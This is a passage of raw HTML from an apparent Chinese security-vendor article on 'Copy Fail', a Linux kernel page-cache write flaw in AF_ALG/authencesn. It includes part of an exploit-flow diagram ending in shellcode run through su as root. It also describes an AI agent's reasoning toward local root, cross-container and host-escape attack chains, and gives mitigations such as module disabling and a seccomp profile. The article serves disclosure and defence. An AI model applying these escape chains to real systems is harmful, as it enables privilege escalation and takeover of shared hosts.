leaf=""><span textstyle="" style="font-size: 12px;">  │</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  ├─ recvmsg() 触发 AEAD 解密操作</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  │     └─ in-place 操作：src == dst，page cache 页在 writable SGL 中</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  │     └─ authencesn 解密时执行 scratch write，向 dst[assoclen+cryptlen] 写入 4 字节</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  │     └─ 这 4 字节跨越 RX SGL 边界，写入链接着的 TX SGL page cache 页</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  │</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">  └─ execve(&#34;/usr/bin/su&#34;) → 从 page cache 加载 → shellcode 执行 → root</span></span></code></pre><p data-sourcepos="45:1-45:53" style="font-style: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;margin-top: 1.5rem;margin-bottom: 1rem;font-weight: 600;line-height: 1.25;font-size: 1.25rem;color: rgb(102, 204, 204);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;" data-pm-slice="0 0 []"><strong><span leaf=""><span textstyle="" style="font-size: 18px;color: rgb(42, 55, 72);">ApexEye对Copy Fail容器逃逸的分析推理</span></span></strong></p><span style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;" data-pm-slice="0 0 []"><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">ApexEye智能体首先识别出Copy Fail的核心原语——对任意可读文件页缓存的4字节精准写入。</span><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">它自主推理：页缓存是内核全局共享资源，不受容器namespace隔离，因此容器内攻击者可污染宿主机setuid文件页缓存。接着，智能体推导出跨容器逃逸路径：同一镜像的多个容器共享底层页缓存，一个</span><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">容器篡改后，另一容器执行该文件即可提权。最终构建出“ 页缓存污染 → 容器逃逸 → 宿主机root”的完整攻击链。</span></span></div><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.75" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100011361" src="https://wechat2rss.xlab.app/img-proxy/?k=ba633683&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCkX1y30sN9YXgApH24UR8AWicMhuhtFaT2zickibQ8w7IC0R6fa8o0icBwcNmHrnp2ia47duYx3Z0Kb65149veH0QENV0bWQrC9GqzI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="letter-spacing: normal;text-align: start;white-space: normal;"><span style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;" data-pm-slice="0 0 []"><strong style="font-size: 16px;font-style: normal;font-variant-caps: normal;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;font-weight: 600;color: rgb(51, 51, 51);caret-color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;" data-pm-slice="0 0 []"><span leaf="">ApexEye智能体构建了三大攻击链：</span></strong></span></p><ol style="list-style-type: decimal;" class="list-paddingleft-1"><li><p style="letter-spacing: normal;text-align: start;white-space: normal;"><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="font-weight: bold;">LPE攻击链：</span>低权限用户污染本地setuid文件页缓存，执行后提权至root。</span></p></li><li><p style="letter-spacing: normal;text-align: start;white-space: normal;"><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="font-weight: bold;">跨容器逃逸攻击链：</span>识别同镜像容器共享页缓存不受namespace隔离，一个容器注入shellcode，同镜像其他容器执行同一文件即获root。</span></p></li><li><p style="letter-spacing: normal;text-align: start;white-space: normal;"><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="font-weight: bold;">宿主机逃逸攻击链：</span>通过/proc/1/root/访问宿主机文件系统，污染宿主机二进制页缓存，等待宿主机用户执行后完成逃逸。</span></p></li></ol><p style="letter-spacing: normal;text-align: start;white-space: normal;"><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">让我们更惊喜的是，ApexEye在此基础上构造出了在特定条件下，<span textstyle="" style="font-weight: bold;">无需宿主机交互</span></span><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="font-weight: bold;">，直接获得宿主机 root权限</span>的攻击链。</span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.3240740740740742" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100011362" src="https://wechat2rss.xlab.app/img-proxy/?k=6241b5ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCns1EgQpJnErDc7eOhgsCGT6DOCiaexzmfOCZQkdiaXo0L0ib0KI6Fx5JO0tyoN42cXPs8S4qHu2ViapdcNHcvOQmsgZeTBATEgtPE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="letter-spacing: normal;text-align: start;white-space: normal;"><span style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;" data-pm-slice="0 0 []"><strong style="font-size: 16px;font-style: normal;font-variant-caps: normal;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;font-weight: 600;color: rgb(51, 51, 51);caret-color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;" data-pm-slice="0 0 []"><span leaf="">Copy Fail对云原生环境构成致命威胁</span></strong></span><ul style="font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;padding-left: 2rem;margin-top: 0px;margin-bottom: 1rem;caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Kubernetes集群：恶意Pod可逃逸至宿主机，进而控制整个节点</span></span></p></li><li style="box-sizing: border-box;margin-top: 0.25rem;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">CI/CD流水线：构建容器可篡改宿主机工具链，实现供应链攻击</span></span></p></li><li style="box-sizing: border-box;margin-top: 0.25rem;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">多租户PaaS平台：租户间隔离可被突破，导致横向移动</span></span></p></li><li style="box-sizing: border-box;margin-top: 0.25rem;"><p><span leaf=""><span textstyle="" style="font-size: 15px;">Serverless/函数计算：底层宿主机权限可被获取</span></span></p></li></ul><table style="font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-transform: none;white-space: normal;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;border-spacing: 0px;border-collapse: collapse;margin-top: 0px;margin-bottom: 1rem;display: block;width: 760px;overflow: auto;caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;"><thead><tr style="box-sizing: border-box;background-color: rgb(254, 255, 255);border-top-width: 1px;border-top-style: solid;border-top-color: rgb(185, 186, 186);"><th style="box-sizing: border-box;padding: 0.375rem 0.75rem;font-weight: 600;border: 1px solid rgb(185, 186, 186);background-color: rgb(231, 232, 232);"><p><span leaf=""><span textstyle="" style="font-size: 14px;">环境</span></span></p></th><th style="box-sizing: border-box;padding: 0.375rem 0.75rem;font-weight: 600;border: 1px solid rgb(185, 186, 186);background-color: rgb(231, 232, 232);"><p><span leaf=""><span textstyle="" style="font-size: 14px;">风险等级</span></span></p></th><th style="box-sizing: border-box;padding: 0.375rem 0.75rem;font-weight: 600;border: 1px solid rgb(185, 186, 186);background-color: rgb(231, 232, 232);"><p><span leaf=""><span textstyle="" style="font-size: 14px;">说明</span></span></p></th></tr></thead><tbody><tr style="box-sizing: border-box;background-color: rgb(254, 255, 255);border-top-width: 1px;border-top-style: solid;border-top-color: rgb(185, 186, 186);"><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><strong style="box-sizing: border-box;font-weight: 600;color: rgb(51, 51, 51);"><span leaf=""><span textstyle="" style="font-size: 14px;">共享服务器</span></span></strong></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;">严重</span></span></p></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p><span leaf=""><span textstyle="" style="font-size: 14px;">任意普通用户直接提权为 root</span></span></p></td></tr><tr style="box-sizing: border-box;background-color: rgb(248, 249, 249);border-top-width: 1px;border-top-style: solid;border-top-color: rgb(185, 186, 186);"><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><strong style="box-sizing: border-box;font-weight: 600;color: rgb(51, 51, 51);"><span leaf=""><span textstyle="" style="font-size: 14px;">Docker 容器（同镜像）</span></span></strong></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;">严重</span></span></p></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p><span leaf=""><span textstyle="" style="font-size: 14px;">跨容器 page cache 共享 → root</span></span></p></td></tr><tr style="box-sizing: border-box;background-color: rgb(254, 255, 255);border-top-width: 1px;border-top-style: solid;border-top-color: rgb(185, 186, 186);"><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><strong style="box-sizing: border-box;font-weight: 600;color: rgb(51, 51, 51);"><span leaf=""><span textstyle="" style="font-size: 14px;">Kubernetes Pod（同节点同镜像）</span></span></strong></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;">严重</span></span></p></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p><span leaf=""><span textstyle="" style="font-size: 14px;">Pod 间逃逸 + 节点逃逸</span></span></p></td></tr><tr style="box-sizing: border-box;background-color: rgb(248, 249, 249);border-top-width: 1px;border-top-style: solid;border-top-color: rgb(185, 186, 186);"><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><strong style="box-sizing: border-box;font-weight: 600;color: rgb(51, 51, 51);"><span leaf=""><span textstyle="" style="font-size: 14px;">CI/CD 执行器</span></span></strong></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;">严重</span></span></p></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p><span leaf=""><span textstyle="" style="font-size: 14px;">恶意 PR 获得 Runner root</span></span></p></td></tr><tr style="box-sizing: border-box;background-color: rgb(254, 255, 255);border-top-width: 1px;border-top-style: solid;border-top-color: rgb(185, 186, 186);"><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><strong style="box-sizing: border-box;font-weight: 600;color: rgb(51, 51, 51);"><span leaf=""><span textstyle="" style="font-size: 14px;">云平台多租户</span></span></strong></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;">严重</span></span></p></td><td style="box-sizing: border-box;padding: 0.375rem 0.75rem;border: 1px solid rgb(185, 186, 186);"><p><span leaf=""><span textstyle="" style="font-size: 14px;">租户提升至宿主机 root</span></span></p></td></tr></tbody></table><h2 data-sourcepos="61:1-61:34" style="font-style: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;margin-top: 1.5rem;margin-bottom: 1rem;font-weight: 600;line-height: 1.25;font-size: 1.25rem;color: rgb(102, 204, 204);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="font-size: 18px;color: rgb(42, 55, 72);">缓解措施与安全建议</span></span></h2><h3 data-sourcepos="63:1-63:27" style="font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;margin-top: 0px;margin-bottom: 1rem;caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;"><span leaf="" style="font-style: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;font-weight: 600;line-height: 1.25;font-size: 1.25rem;color: rgb(102, 204, 204);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;"><span textstyle="" style="font-size: 16px;color: rgb(26, 36, 51);">紧急缓解措施</span></span></h3><pre data-sourcepos="65:1-76:3" tabindex="0" style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;margin: 0.5rem 0px;overflow-wrap: normal;padding: 1rem;overflow: auto;line-height: 1.45;background: rgb(247, 248, 248);border-radius: 0.1875rem;color: black;text-align: left;word-spacing: normal;word-break: normal;tab-size: 4;hyphens: none;"><code style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;padding: 0px;margin: 0px;background-color: initial;color: rgb(9, 132, 79);border-radius: 0.1875rem;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;text-align: left;word-spacing: normal;word-break: normal;overflow-wrap: normal;tab-size: 4;hyphens: none;border: 0px;display: inline;overflow: visible;line-height: inherit;"><span style="box-sizing: border-box;color: rgb(142, 156, 146);"><span leaf=""><span textstyle="" style="font-size: 12px;"># 1. 立即禁用 algif_aead 内核模块</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(150, 125, 65);"><span leaf=""><span textstyle="" style="font-size: 12px;">echo</span></span></span><span style="box-sizing: border-box;color: rgb(211, 45, 38);"><span leaf=""><span textstyle="" style="font-size: 12px;">&#34;install algif_aead /bin/false&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">&gt;</span></span></span><span leaf=""><span textstyle="" style="font-size: 12px;"> /etc/modprobe.d/disable-algif-aead.conf</span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">rmmod algif_aead </span></span><span style="box-sizing: border-box;"><span style="box-sizing: border-box;color: rgb(120, 72, 48);font-weight: bold;"><span leaf=""><span textstyle="" style="font-size: 12px;">2</span></span></span><span leaf=""><span textstyle="" style="font-size: 12px;">&gt;</span></span></span><span leaf=""><span textstyle="" style="font-size: 12px;">/dev/null</span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(142, 156, 146);"><span leaf=""><span textstyle="" style="font-size: 12px;"># 2. 或通过 seccomp 策略阻止 AF_ALG socket</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(142, 156, 146);"><span leaf=""><span textstyle="" style="font-size: 12px;"># 在容器运行时添加：</span></span></span><span leaf=""><br/></span><span leaf=""><span textstyle="" style="font-size: 12px;">--security-opt </span></span><span style="box-sizing: border-box;color: rgb(120, 72, 48);"><span leaf=""><span textstyle="" style="font-size: 12px;">seccomp</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">=</span></span></span><span leaf=""><span textstyle="" style="font-size: 12px;">/path/to/seccomp-profile.json</span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(142, 156, 146);"><span leaf=""><span textstyle="" style="font-size: 12px;"># 其中 seccomp-profile 禁止 socket(AF_ALG, ...)</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(142, 156, 146);"><span leaf=""><span textstyle="" style="font-size: 12px;"># 3. 更新内核至包含修复的版本（≥ commit a664bf3d603d）</span></span></span></code></pre><h3 data-sourcepos="78:1-78:29" style="font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;margin-top: 0px;margin-bottom: 1rem;caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;"><span leaf="" style="font-style: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;font-weight: 600;line-height: 1.25;font-size: 1.25rem;color: rgb(102, 204, 204);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;"><span textstyle="" style="font-size: 16px;color: rgb(26, 36, 51);">Seccomp 策略示例</span></span></h3><pre data-sourcepos="80:1-98:3" tabindex="0" style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;margin: 0.5rem 0px;overflow-wrap: normal;padding: 1rem;overflow: auto;line-height: 1.45;background: rgb(247, 248, 248);border-radius: 0.1875rem;color: black;text-align: left;word-spacing: normal;word-break: normal;tab-size: 4;hyphens: none;"><code style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;padding: 0px;margin: 0px;background-color: initial;color: rgb(9, 132, 79);border-radius: 0.1875rem;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;text-align: left;word-spacing: normal;word-break: normal;overflow-wrap: normal;tab-size: 4;hyphens: none;border: 0px;display: inline;overflow: visible;line-height: inherit;"><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">{</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">    &#34;defaultAction&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(211, 45, 38);"><span leaf=""><span textstyle="" style="font-size: 12px;">&#34;SCMP_ACT_ALLOW&#34;</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">,</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">    &#34;architectures&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">[</span></span></span><span style="box-sizing: border-box;color: rgb(211, 45, 38);"><span leaf=""><span textstyle="" style="font-size: 12px;">&#34;SCMP_ARCH_X86_64&#34;</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">]</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">,</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">    &#34;syscalls&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">[</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">        {</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">            &#34;names&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">[</span></span></span><span style="box-sizing: border-box;color: rgb(211, 45, 38);"><span leaf=""><span textstyle="" style="font-size: 12px;">&#34;socket&#34;</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">]</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">,</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">            &#34;action&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(211, 45, 38);"><span leaf=""><span textstyle="" style="font-size: 12px;">&#34;SCMP_ACT_ALLOW&#34;</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">,</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">            &#34;args&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">[</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">                {</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">                    &#34;index&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">0</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">,</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">                    &#34;value&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">38</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">,</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">                    &#34;op&#34;</span></span></span><span style="box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(211, 45, 38);"><span leaf=""><span textstyle="" style="font-size: 12px;">&#34;SCMP_CMP_NE&#34;</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">                }</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">            ]</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">        }</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">    ]</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 